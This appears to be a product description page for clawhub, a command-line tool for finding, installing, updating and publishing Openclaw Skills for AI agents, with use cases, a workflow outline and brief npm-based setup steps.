What is clawhub?

clawhub is a powerful CLI utility designed for developers to interact with the central registry of Openclaw Skills. It provides a standardized workflow for searching, installing, and versioning skills, ensuring that AI agents have access to the most up-to-date capabilities. By bridging the gap between the registry and local agent environments, it simplifies the deployment of complex agentic workflows.

The tool is built to work in tandem with the openclaw-agent, providing a robust infrastructure for skill distribution. Whether you are searching for pre-built functionality or publishing your own custom Openclaw Skills, this CLI serves as the primary gateway for skill management and synchronization.

clawhub Use Cases

  • Searching for and discovering new Openclaw Skills for agent integration.
  • Installing specific skill versions to maintain environment stability.
  • Synchronizing local skills with the latest registry updates using hash-based matching.
  • Publishing and sharing custom-developed skills with the community.
  • Automating skill installation within agent deployment pipelines.

How clawhub Works

  1. The user ensures the openclaw-agent utility is active on the host machine to facilitate secure operations.
  2. The clawhub CLI connects to the registry at clawhub.ai to fetch metadata and skill packages.
  3. Commands like search and install allow users to populate a local directory (defaulting to /skills) with Openclaw Skills.
  4. The update command performs a hash-based comparison of local files against the registry to determine if upgrades are required.
  5. Developers use the publish command to bundle and upload local skill directories to the central repository.

clawhub Setup

First, ensure the openclaw-agent is running on your system. Windows users should run the official executable, while macOS users should run the provided installation script.

Install the CLI globally using npm:

npm i -g clawhub

Verify your session or login to publish skills:

clawhub login
clawhub whoami
